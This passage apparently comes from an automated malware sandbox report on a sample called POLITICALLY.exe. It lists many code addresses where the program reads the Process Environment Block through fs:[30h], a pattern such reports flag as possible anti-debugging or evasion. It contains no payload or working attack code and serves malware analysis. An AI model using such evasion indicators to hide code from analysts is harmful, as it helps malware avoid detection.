Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h]	10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]	10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]	10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h]	10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25746D mov eax, dword ptr fs:[00000030h]	10_2_1E25746D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A44B mov eax, dword ptr fs:[00000030h]	10_2_1E26A44B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]	10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h]	10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24849B mov eax, dword ptr fs:[00000030h]	10_2_1E24849B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F14FB mov eax, dword ptr fs:[00000030h]	10_2_1E2F14FB
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308CD6 mov eax, dword ptr fs:[00000030h]	10_2_1E308CD6
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308D34 mov eax, dword ptr fs:[00000030h]	10_2_1E308D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h]	10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23AD30 mov eax, dword ptr fs:[00000030h]	10_2_1E23AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FE539 mov eax, dword ptr fs:[00000030h]	10_2_1E2FE539
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2BA537 mov eax, dword ptr fs:[00000030h]	10_2_1E2BA537
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]	10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]	10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h]	10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]	10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h]	10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E273D43 mov eax, dword ptr fs:[00000030h]	10_2_1E273D43
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B3540 mov eax, dword ptr fs:[00000030h]	10_2_1E2B3540
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2E3D40 mov eax, dword ptr fs:[00000030h]	10_2_1E2E3D40
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E257D50 mov eax, dword ptr fs:[00000030h]	10_2_1E257D50
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2635A1 mov eax, dword ptr fs:[00000030h]	10_2_1E2635A1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h]	10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]	10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h]	10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]	10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]	10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]	10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h]	10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]	10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]	10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]	10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]	10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h]	10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]	10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h]	10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]	10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h]	10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]	10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]	10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]	10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h]	10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h]	10_2_1E2E8DF1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h]	10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]	10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h]	10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E248A0A mov eax, dword ptr fs:[00000030h]	10_2_1E248A0A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]	10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E235210 mov ecx, dword ptr fs:[00000030h]	10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]	10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h]	10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]	10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h]	10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E253A1C mov eax, dword ptr fs:[00000030h]	10_2_1E253A1C
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]	10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h]	10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]	10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h]	10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308A62 mov eax, dword ptr fs:[00000030h]	10_2_1E308A62
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E27927A mov eax, dword ptr fs:[00000030h]	10_2_1E27927A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]	10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]	10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]	10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h]	10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2FEA55 mov eax, dword ptr fs:[00000030h]	10_2_1E2FEA55
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2C4257 mov eax, dword ptr fs:[00000030h]	10_2_1E2C4257
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]	10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]	10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]	10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]	10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h]	10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26FAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E26FAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]	10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h]	10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262AE4 mov eax, dword ptr fs:[00000030h]	10_2_1E262AE4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262ACB mov eax, dword ptr fs:[00000030h]	10_2_1E262ACB
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F131B mov eax, dword ptr fs:[00000030h]	10_2_1E2F131B
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23DB60 mov ecx, dword ptr fs:[00000030h]	10_2_1E23DB60
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]	10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h]	10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23DB40 mov eax, dword ptr fs:[00000030h]	10_2_1E23DB40
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E308B58 mov eax, dword ptr fs:[00000030h]	10_2_1E308B58
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23F358 mov eax, dword ptr fs:[00000030h]	10_2_1E23F358
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]	10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]	10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E264BAD mov eax, dword ptr fs:[00000030h]	10_2_1E264BAD
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E305BA5 mov eax, dword ptr fs:[00000030h]	10_2_1E305BA5
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F138A mov eax, dword ptr fs:[00000030h]	10_2_1E2F138A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]	10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E241B8F mov eax, dword ptr fs:[00000030h]	10_2_1E241B8F
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2ED380 mov ecx, dword ptr fs:[00000030h]	10_2_1E2ED380
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262397 mov eax, dword ptr fs:[00000030h]	10_2_1E262397
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26B390 mov eax, dword ptr fs:[00000030h]	10_2_1E26B390
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2603E2 mov eax, dword ptr fs:[00000030h]	10_2_1E2603E2
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25DBE9 mov eax, dword ptr fs:[00000030h]	10_2_1E25DBE9
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]	10_2_1E2B53CA
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B53CA mov eax, dword ptr fs:[00000030h]	10_2_1E2B53CA
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]	10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]	10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]	10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]	10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26002D mov eax, dword ptr fs:[00000030h]	10_2_1E26002D
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]	10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]	10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]	10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E24B02A mov eax, dword ptr fs:[00000030h]	10_2_1E24B02A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]	10_2_1E304015
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E304015 mov eax, dword ptr fs:[00000030h]	10_2_1E304015
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B7016 mov eax, dword ptr fs:[00000030h]	10_2_1E2B7016
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E301074 mov eax, dword ptr fs:[00000030h]	10_2_1E301074
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F2073 mov eax, dword ptr fs:[00000030h]	10_2_1E2F2073
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]	10_2_1E250050
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E250050 mov eax, dword ptr fs:[00000030h]	10_2_1E250050
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2620A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2620A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2790AF mov eax, dword ptr fs:[00000030h]	10_2_1E2790AF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26F0BF mov ecx, dword ptr fs:[00000030h]	10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]	10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26F0BF mov eax, dword ptr fs:[00000030h]	10_2_1E26F0BF
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239080 mov eax, dword ptr fs:[00000030h]	10_2_1E239080
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]	10_2_1E2B3884
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B3884 mov eax, dword ptr fs:[00000030h]	10_2_1E2B3884
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]	10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]	10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2340E1 mov eax, dword ptr fs:[00000030h]	10_2_1E2340E1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2358EC mov eax, dword ptr fs:[00000030h]	10_2_1E2358EC
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov ecx, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2CB8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E2CB8D0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120 mov eax, dword ptr fs:[00000030h]	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E254120 mov ecx, dword ptr fs:[00000030h]	10_2_1E254120
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]	10_2_1E26513A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26513A mov eax, dword ptr fs:[00000030h]	10_2_1E26513A
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]	10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]	10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E239100 mov eax, dword ptr fs:[00000030h]	10_2_1E239100
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23C962 mov eax, dword ptr fs:[00000030h]	10_2_1E23C962
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]	10_2_1E23B171
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23B171 mov eax, dword ptr fs:[00000030h]	10_2_1E23B171
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]	10_2_1E25B944
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25B944 mov eax, dword ptr fs:[00000030h]	10_2_1E25B944
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2661A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2661A0 mov eax, dword ptr fs:[00000030h]	10_2_1E2661A0
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]	10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]	10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]	10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2F49A4 mov eax, dword ptr fs:[00000030h]	10_2_1E2F49A4
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B69A6 mov eax, dword ptr fs:[00000030h]	10_2_1E2B69A6
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]	10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]	10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]	10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E2B51BE mov eax, dword ptr fs:[00000030h]	10_2_1E2B51BE
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E26A185 mov eax, dword ptr fs:[00000030h]	10_2_1E26A185
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E25C182 mov eax, dword ptr fs:[00000030h]	10_2_1E25C182
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E262990 mov eax, dword ptr fs:[00000030h]	10_2_1E262990
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E23B1E1
Source: C:\Users\user\Desktop\POLITICALLY.exe	Code function: 10_2_1E23B1E1 mov eax, dword ptr fs:[00000030h]	10_2_1E23B1E1
